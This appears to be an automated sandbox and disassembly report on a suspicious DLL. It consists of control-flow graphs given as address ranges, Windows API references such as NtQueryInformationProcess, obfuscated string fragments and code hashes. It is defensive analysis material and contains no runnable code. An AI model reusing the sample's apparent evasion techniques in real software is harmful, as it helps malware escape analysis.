68bf78ca-68bf790d NtQueryInformationProcess 1504->1508 1509 68bf6fd2-68bf6fdf 1504->1509 1505->1461 1508->1461 1514 68bf6fe5-68bf6ff2 1509->1514 1515 68bf7f04-68bf7f69 GetModuleHandleW call 68bf4810 call 68c019f0 1509->1515 1518 68bf6ff8-68bf7005 1514->1518 1519 68bf7fb5-68bf7fbf 1514->1519 1515->1461 1523 68bf700b-68bf7018 1518->1523 1524 68bf7ab2-68bf7ab9 1518->1524 1519->1461 1527 68bf701e-68bf702b 1523->1527 1528 68bf7d01-68bf7d77 1523->1528 1524->1461 1530 68bf7779-68bf77df 1527->1530 1531 68bf7031-68bf703e 1527->1531 1528->1461 1530->1461 1533 68bf7044-68bf7051 1531->1533 1534 68bf79f0-68bf79f7 1531->1534 1536 68bf7a5c-68bf7aad 1533->1536 1537 68bf7057-68bf7064 1533->1537 1534->1461 1536->1461 1539 68bf706a-68bf7077 1537->1539 1540 68bf7ef8-68bf7eff 1537->1540 1542 68bf707d-68bf708a 1539->1542 1543 68bf7702-68bf7709 1539->1543 1540->1461 1545 68bf7bf2-68bf7c3b 1542->1545 1546 68bf7090-68bf709d 1542->1546 1543->1461 1545->1461 1548 68bf77e4-68bf7852 1546->1548 1549 68bf70a3-68bf70b0 1546->1549 1548->1461 1551 68bf7857-68bf78b9 1549->1551 1552 68bf70b6-68bf70c3 1549->1552 1551->1461 1554 68bf7dca-68bf7dd1 1552->1554 1555 68bf70c9-68bf70d6 1552->1555 1554->1461 1557 68bf70dc-68bf70e9 1555->1557 1558 68bf7e43-68bf7ec0 1555->1558 1560 68bf70ef-68bf70fc 1557->1560 1561 68bf7f89-68bf7f98 1557->1561 1558->1461 1563 68bf7102-68bf710f 1560->1563 1564 68bf7df1-68bf7df8 1560->1564 1561->1461 1566 68bf7f9d-68bf7fa4 1563->1566 1567 68bf7115-68bf7122 1563->1567 1564->1461 1566->1461 1569 68bf79fc-68bf7a09 1567->1569 1570 68bf7128-68bf7135 1567->1570 1569->1461 1572 68bf7a0e-68bf7a57 1570->1572 1573 68bf713b-68bf7148 1570->1573 1572->1461 1575 68bf714e-68bf715b 1573->1575 1576 68bf7dd6-68bf7df0 call 68c00dc0 1573->1576 1579 68bf7b25-68bf7b93 1575->1579 1580 68bf7161-68bf716e 1575->1580 1579->1461 1583 68bf7fc4-68bf7fd3 1580->1583 1584 68bf7174-68bf7181 1580->1584 1583->1461 1586 68bf735a-68bf73c0 1584->1586 1587 68bf7187-68bf7194 1584->1587 1586->1461 1589 68bf7d7c-68bf7dc5 1587->1589 1590 68bf719a-68bf71a7 1587->1590 1589->1461 1592 68bf71ad-68bf71ba 1590->1592 1593 68bf7ed1-68bf7edb 1590->1593 1595 68bf7927-68bf7970 1592->1595 1596 68bf71c0-68bf71cd 1592->1596 1593->1461 1595->1461 1598 68bf7f6e-68bf7f75 1596->1598 1599 68bf71d3-68bf71e0 1596->1599 1598->1461 1601 68bf7f7a-68bf7f84 1599->1601 1602 68bf71e6-68bf71f3 1599->1602 1601->1461 1604 68bf78be-68bf78c5 1602->1604 1605 68bf71f9-68bf7206 1602->1605 1604->1461 1607 68bf720c-68bf7219 1605->1607 1608 68bf7975-68bf79eb 1605->1608 1610 68bf721f-68bf722c 1607->1610 1611 68bf770e-68bf7774 1607->1611 1608->1461 1613 68bf7abe-68bf7ac5 1610->1613 1614 68bf7232-68bf723f 1610->1614 1611->1461 1613->1461 1616 68bf7245-68bf7252 1614->1616 1617 68bf7490-68bf74fe 1614->1617 1619 68bf7258-68bf7265 1616->1619 1620 68bf7912-68bf7922 1616->1620 1617->1461 1622 68bf726b-68bf7278 1619->1622 1623 68bf7c40-68bf7c89 1619->1623 1620->1461 1625 68bf7c8e-68bf7cfc 1622->1625 1626 68bf727e-68bf728b 1622->1626 1623->1461 1625->1461 1628 68bf7aca-68bf7ada 1626->1628 1629 68bf7291-68bf729e 1626->1629 1628->1461 1631 68bf75ac-68bf75b3 1629->1631 1632 68bf72a4-68bf72b1 1629->1632 1631->1461 1634 68bf72b7-68bf72bc 1632->1634 1635 68bf7ba4-68bf7bed 1632->1635 1634->1461 1635->1461
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "m&$"m&$@B_A$@B_A$D6w_$NtQueryInformationProcess$Y($Y($ntdll.dll
                                                                                                                                                            • API String ID: 0-3531410141
                                                                                                                                                            • Opcode ID: 6d887758aea5c35e90abd8bb03a1e77b03ff6d5bffd587dcacd1bf7e5e025ea7
                                                                                                                                                            • Instruction ID: 33a5c6da847d0651b6e443bb8b14410122fafa384fe4798e10dc8fceb18d6833
                                                                                                                                                            • Opcode Fuzzy Hash: 6d887758aea5c35e90abd8bb03a1e77b03ff6d5bffd587dcacd1bf7e5e025ea7
                                                                                                                                                            • Instruction Fuzzy Hash: A392DE36A401C58FCF088E7CD6A47EE7BF2EB42315F109526E425DB394D62AD90F8B09

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1637 68c00f28-68c00f3b call 68c01790 1640 68c00f41-68c00f63 call 68c01370 1637->1640 1641 68c00f3d-68c00f3f 1637->1641 1645 68c00fd0-68c00fe9 call 68c0160a call 68c01790 1640->1645 1646 68c00f65-68c00fa8 call 68c0143b call 68c012f7 call 68c01759 call 68c00fbd call 68c015dc call 68c00fca 1640->1646 1642 68c00faa-68c00fb9 1641->1642 1658 68c00ffa-68c01001 1645->1658 1659 68c00feb-68c00ff1 1645->1659 1646->1642 1662 68c01003-68c01006 1658->1662 1663 68c0100d-68c01021 dllmain_raw 1658->1663 1659->1658 1661 68c00ff3-68c00ff5 1659->1661 1665 68c010d3-68c010e2 1661->1665 1662->1663 1666 68c01008-68c0100b 1662->1666 1667 68c01027-68c01038 dllmain_crt_dispatch 1663->1667 1668 68c010ca-68c010d1 1663->1668 1670 68c0103e-68c01050 call 68bffcb0 1666->1670 1667->1668 1667->1670 1668->1665 1676 68c01052-68c01054 1670->1676 1677 68c01079-68c0107b 1670->1677 1676->1677 1680 68c01056-68c01074 call 68bffcb0 call 68c00f28 dllmain_raw 1676->1680 1678 68c01082-68c01093 dllmain_crt_dispatch 1677->1678 1679 68c0107d-68c01080 1677->1679 1678->1668 1681 68c01095-68c010c7 dllmain_raw 1678->1681 1679->1668 1679->1678 1680->1677 1681->1668
                                                                                                                                                            APIs
                                                                                                                                                            • __RTC_Initialize.LIBCMT ref: 68C00F6F
                                                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 68C00F89
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2442719207-0
                                                                                                                                                            • Opcode ID: a91a79f38cd793a850ef2cf980a87ed69609ede4b83b35e546b9690dc1fd9be0
                                                                                                                                                            • Instruction ID: 297682e26fb15ae82f40b01ce56b1a9f85245a4bc8fb955ccec4db094f724196
                                                                                                                                                            • Opcode Fuzzy Hash: a91a79f38cd793a850ef2cf980a87ed69609ede4b83b35e546b9690dc1fd9be0
                                                                                                                                                            • Instruction Fuzzy Hash: 8441D476D04259EEDB218F9DD800B7EBAB5FB417DCF514126E86467240E7328942DB90

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1687 68c00fd8-68c00fe9 call 68c01790 1690 68c00ffa-68c01001 1687->1690 1691 68c00feb-68c00ff1 1687->1691 1693 68c01003-68c01006 1690->1693 1694 68c0100d-68c01021 dllmain_raw 1690->1694 1691->1690 1692 68c00ff3-68c00ff5 1691->1692 1695 68c010d3-68c010e2 1692->1695 1693->1694 1696 68c01008-68c0100b 1693->1696 1697 68c01027-68c01038 dllmain_crt_dispatch 1694->1697 1698 68c010ca-68c010d1 1694->1698 1699 68c0103e-68c01050 call 68bffcb0 1696->1699 1697->1698 1697->1699 1698->1695 1702 68c01052-68c01054 1699->1702 1703 68c01079-68c0107b 1699->1703 1702->1703 1706 68c01056-68c01074 call 68bffcb0 call 68c00f28 dllmain_raw 1702->1706 1704 68c01082-68c01093 dllmain_crt_dispatch 1703->1704 1705 68c0107d-68c01080 1703->1705 1704->1698 1707 68c01095-68c010c7 dllmain_raw 1704->1707 1705->1698 1705->1704 1706->1703 1707->1698
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3136044242-0
                                                                                                                                                            • Opcode ID: fc44eae3a722a51df69647349e9ce75a56f855e2e75e24e7c078a59db6dabca0
                                                                                                                                                            • Instruction ID: cdbcdb3ccfa8687e7c2841aace448ee4d44612a217c2f621da4d61c66deceb2e
                                                                                                                                                            • Opcode Fuzzy Hash: fc44eae3a722a51df69647349e9ce75a56f855e2e75e24e7c078a59db6dabca0
                                                                                                                                                            • Instruction Fuzzy Hash: 4C219176D042A9EADB214F5DD840A7FBAB9FB807DCF514126F8645B210E7328D428BA0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1713 68c00e21-68c00e37 call 68c01790 call 68c0146b 1718 68c00e3d-68c00e55 call 68c01370 1713->1718 1719 68c00f0e 1713->1719 1723 68c00f20-68c00f27 call 68c0160a 1718->1723 1724 68c00e5b-68c00e6c call 68c013cd 1718->1724 1721 68c00f10-68c00f1f 1719->1721 1729 68c00ebb-68c00ec9 call 68c00f04 1724->1729 1730 68c00e6e-68c00e87 call 68c0172d call 68c012eb call 68c0130f call 68c02a51 1724->1730 1729->1719 1736 68c00ecb-68c00ed5 call 68c01604 1729->1736 1747 68c00e8c-68c00e90 1730->1747 1741 68c00ef6-68c00eff 1736->1741 1742 68c00ed7-68c00ee0 call 68c0152b 1736->1742 1741->1721 1742->1741 1748 68c00ee2-68c00ef4 1742->1748 1747->1729 1749 68c00e92-68c00e99 call 68c013a2 1747->1749 1748->1741 1749->1729 1753 68c00e9b-68c00eb8 call 68c02a0c 1749->1753 1753->1729
                                                                                                                                                            APIs
                                                                                                                                                            • __RTC_Initialize.LIBCMT ref: 68C00E6E
                                                                                                                                                              • Part of subcall function 68C012EB: InitializeSListHead.KERNEL32(68C60988,68C00E78,68C100D8,00000010,68C00E09,?,?,?,68C01031,?,00000001,?,?,00000001,?,68C10120), ref: 68C012F0
                                                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 68C00ED8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3231365870-0
                                                                                                                                                            • Opcode ID: cee31229af79a04b2bb6b4e1829c77faee8cf3b1e078e1b720605dbcccd56d36
                                                                                                                                                            • Instruction ID: 26a5df72c01b70952ac3886ea8a0d5d889be644b978c03a160b952e7123fa5cf
                                                                                                                                                            • Opcode Fuzzy Hash: cee31229af79a04b2bb6b4e1829c77faee8cf3b1e078e1b720605dbcccd56d36
                                                                                                                                                            • Instruction Fuzzy Hash: 6421F03A588309DEDB11AFBC84047BEB3A19B023EDFC1002AD5A0772C1FB738086C656

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1756 68c05c4d-68c05c52 1757 68c05c54-68c05c6c 1756->1757 1758 68c05c7a-68c05c83 1757->1758 1759 68c05c6e-68c05c72 1757->1759 1761 68c05c95 1758->1761 1762 68c05c85-68c05c88 1758->1762 1759->1758 1760 68c05c74-68c05c78 1759->1760 1763 68c05cf3-68c05cf7 1760->1763 1766 68c05c97-68c05ca4 GetStdHandle 1761->1766 1764 68c05c91-68c05c93 1762->1764 1765 68c05c8a-68c05c8f 1762->1765 1763->1757 1767 68c05cfd-68c05d00 1763->1767 1764->1766 1765->1766 1768 68c05cb3 1766->1768 1769 68c05ca6-68c05ca8 1766->1769 1771 68c05cb5-68c05cb7 1768->1771 1769->1768 1770 68c05caa-68c05cb1 GetFileType 1769->1770 1770->1771 1772 68c05cd5-68c05ce7 1771->1772 1773 68c05cb9-68c05cc2 1771->1773 1772->1763 1774 68c05ce9-68c05cec 1772->1774 1775 68c05cc4-68c05cc8 1773->1775 1776 68c05cca-68c05ccd 1773->1776 1774->1763 1775->1763 1776->1763 1777 68c05ccf-68c05cd3 1776->1777 1777->1763
                                                                                                                                                            APIs
                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 68C05C99
                                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 68C05CAB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3000768030-0
                                                                                                                                                            • Opcode ID: 85ff5dafe7e8562c88ce8ec74c055a448c256ba093fc65bac86b5f24ef25eb61
                                                                                                                                                            • Instruction ID: 99dff4039222ff362bbcb52cbc11eb30a1540616bf0b60ea08fad81bace1ef7e
                                                                                                                                                            • Opcode Fuzzy Hash: 85ff5dafe7e8562c88ce8ec74c055a448c256ba093fc65bac86b5f24ef25eb61
                                                                                                                                                            • Instruction Fuzzy Hash: 8711DD71604B9187D7304E3F8C88616BEA4B74F2B0F640B19D4B6E66E1E333D587C642

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1778 68c064b0-68c064bb 1779 68c064c4-68c064c6 1778->1779 1780 68c064bd-68c064c2 1778->1780 1782 68c064c8 1779->1782 1783 68c064cf-68c064d2 call 68c04216 1779->1783 1781 68c064ca 1780->1781 1781->1783 1782->1781 1785 68c064d7-68c064ed call 68c04273 1783->1785 1788 68c0651a-68c0651d 1785->1788 1789 68c064ef-68c06513 call 68c04216 call 68c04273 1785->1789 1791 68c06522-68c06555 call 68c05a42 1788->1791 1789->1788 1799 68c06515-68c06519 1789->1799 1797 68c06560 1791->1797 1798 68c06557-68c0655a 1791->1798 1801 68c06567-68c06571 1797->1801 1798->1797 1800 68c0655c-68c0655e 1798->1800 1800->1797 1800->1801 1801->1791 1802 68c06573-68c06577 1801->1802
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                            • Opcode ID: 366beebe56c32251fb024419a8aa9f8f938763fed09709c68c65beec06799c47
                                                                                                                                                            • Instruction ID: 191be86eacb94e502930ce05fe09b64074502b6620fe3c0821a4b84421473232
                                                                                                                                                            • Opcode Fuzzy Hash: 366beebe56c32251fb024419a8aa9f8f938763fed09709c68c65beec06799c47
                                                                                                                                                            • Instruction Fuzzy Hash: EB118171A04750DBDE20CE2EAC44B6A72A4BF527B9F440626F764EB2C4F375D4C28640

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1803 68c04216-68c04221 1804 68c04223-68c0422d 1803->1804 1805 68c0422f-68c04235 1803->1805 1804->1805 1806 68c04263-68c0426e call 68c04203 1804->1806 1807 68c04237-68c04238 1805->1807 1808 68c0424e-68c0425f RtlAllocateHeap 1805->1808 1813 68c04270-68c04272 1806->1813 1807->1808 1809 68c04261 1808->1809 1810 68c0423a-68c04241 call 68c06c75 1808->1810 1809->1813 1810->1806 1816 68c04243-68c0424c call 68c05e35 1810->1816 1816->1806 1816->1808
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,68C03E19,00000001,00000364,00000013,000000FF,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C04257
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 341884f01d681e0bd869c5ead4b6ec00c9763a5010d13d005ed0cb4fba30706c
                                                                                                                                                            • Instruction ID: 5534fe9ac71f0563031ec6943a29c727519af363fb3a1ebf2ae18e19747d17e6
                                                                                                                                                            • Opcode Fuzzy Hash: 341884f01d681e0bd869c5ead4b6ec00c9763a5010d13d005ed0cb4fba30706c
                                                                                                                                                            • Instruction Fuzzy Hash: 62F0E031B4963467EB318E2E9C04B5B7768EF927E8F954011DC34A7184FB62D50243D0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1866 68c4a4a0-68c4a4c3 1867 68c4a4c8-68c4a4d3 1866->1867 1867->1867 1868 68c4a4d5 1867->1868 1869 68c4a4d7-68c4a4da 1868->1869 1870 68c4a4dc-68c4a507 1869->1870 1871 68c4a509-68c4a525 1869->1871 1870->1869 1872 68c4a52a-68c4a535 1871->1872 1872->1872 1873 68c4a537 1872->1873 1874 68c4a539-68c4a53c 1873->1874 1875 68c4a53e-68c4a569 1874->1875 1876 68c4a56b-68c4a58e 1874->1876 1875->1874 1877 68c4a590-68c4a593 1876->1877 1878 68c4a595-68c4a5c5 1877->1878 1879 68c4a5c7-68c4a5cc 1877->1879 1878->1877 1880 68c4a5d2-68c4a5ee 1879->1880 1881 68c4a7f8-68c4a7fa 1879->1881 1882 68c4a5f3-68c4a5fe 1880->1882 1883 68c4a800-68c4a80c 1881->1883 1882->1882 1884 68c4a600 1882->1884 1885 68c4a602-68c4a605 1884->1885 1886 68c4a655-68c4a659 1885->1886 1887 68c4a607-68c4a653 1885->1887 1886->1881 1888 68c4a65f-68c4a67b 1886->1888 1887->1885 1889 68c4a680-68c4a68b 1888->1889 1889->1889 1890 68c4a68d 1889->1890 1891 68c4a68f-68c4a692 1890->1891 1892 68c4a694-68c4a6ea 1891->1892 1893 68c4a6ec-68c4a6f5 1891->1893 1892->1891 1893->1881 1894 68c4a6fb-68c4a719 1893->1894 1896 68c4a71e-68c4a729 1894->1896 1896->1896 1897 68c4a72b 1896->1897 1898 68c4a72d-68c4a730 1897->1898 1899 68c4a732-68c4a771 1898->1899 1900 68c4a773-68c4a777 1898->1900 1899->1898 1900->1881 1901 68c4a779-68c4a795 1900->1901 1902 68c4a79a-68c4a7a5 1901->1902 1902->1902 1903 68c4a7a7 1902->1903 1904 68c4a7a9-68c4a7ac 1903->1904 1905 68c4a7ee-68c4a7f4 1904->1905 1906 68c4a7ae-68c4a7ec 1904->1906 1905->1881 1907 68c4a7f6-68c4a7fe 1905->1907 1906->1904 1907->1883
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ?$A$A$P$S$X$^$_$b$c$g$l$m$n$|$}
                                                                                                                                                            • API String ID: 0-3745545875
                                                                                                                                                            • Opcode ID: 8bfdf7074d3ad7e1e1f9cb854a269e5ffabb8806a70228f27a4afefa069409f6
                                                                                                                                                            • Instruction ID: f2520ae6169038597f89538fddedb25f695197cc2a23bcc2840a972f64ae9250
                                                                                                                                                            • Opcode Fuzzy Hash: 8bfdf7074d3ad7e1e1f9cb854a269e5ffabb8806a70228f27a4afefa069409f6
                                                                                                                                                            • Instruction Fuzzy Hash: C7A1E863A0C7D08AE311813DC84834BAEE25BD6218F5D897DE4E497783E1BAC587C363

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1966 68c3dc30-68c3dc81 call 68c187e0 1969 68c3dc90-68c3dcc0 1966->1969 1969->1969 1970 68c3dcc2-68c3dd03 1969->1970 1971 68c3dd10-68c3dd6f 1970->1971 1971->1971 1972 68c3dd71-68c3de95 1971->1972 1973 68c3dea0-68c3ded3 1972->1973 1973->1973 1974 68c3ded5-68c3dee1 1973->1974 1975 68c3dee3-68c3deef 1974->1975 1976 68c3defb-68c3df05 1974->1976 1977 68c3def0-68c3def9 1975->1977 1978 68c3df07-68c3df0a 1976->1978 1979 68c3df1d 1976->1979 1977->1976 1977->1977 1980 68c3df10-68c3df19 1978->1980 1981 68c3df1f-68c3df2d 1979->1981 1980->1980 1982 68c3df1b 1980->1982 1983 68c3df2f-68c3df37 1981->1983 1984 68c3df4d 1981->1984 1982->1981 1985 68c3df40-68c3df49 1983->1985 1986 68c3df4f-68c3df5c 1984->1986 1985->1985 1987 68c3df4b 1985->1987 1988 68c3df6b-68c3df77 1986->1988 1989 68c3df5e-68c3df5f 1986->1989 1987->1986 1991 68c3df8b-68c3dfbd call 68c51c60 1988->1991 1992 68c3df79-68c3df7f 1988->1992 1990 68c3df60-68c3df69 1989->1990 1990->1988 1990->1990 1993 68c3df80-68c3df89 1992->1993 1993->1991 1993->1993
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
                                                                                                                                                            • API String ID: 0-2264557016
                                                                                                                                                            • Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                                                                                                            • Instruction ID: 924d68c0078333b33edf11a5af577bbc5856a3d6a0af467fe2d1e950ec2d8e6e
                                                                                                                                                            • Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                                                                                                            • Instruction Fuzzy Hash: EB91D2B0204B918BD325CF3988907A3BFE1EF96204F59896DD5FB8B382D7356406CB61
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                                                                                                            • API String ID: 0-720759029
                                                                                                                                                            • Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                                                                                                            • Instruction ID: 0319cd739aabe8598cceb929fb5966fc0bb5a0ddf1f79ff9c08fec718cb31ac4
                                                                                                                                                            • Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                                                                                                            • Instruction Fuzzy Hash: 1DE1FDB5A083009FE3108F65DC85B5FBBA4EF85714F40892CF6A49B290E774C846CB92
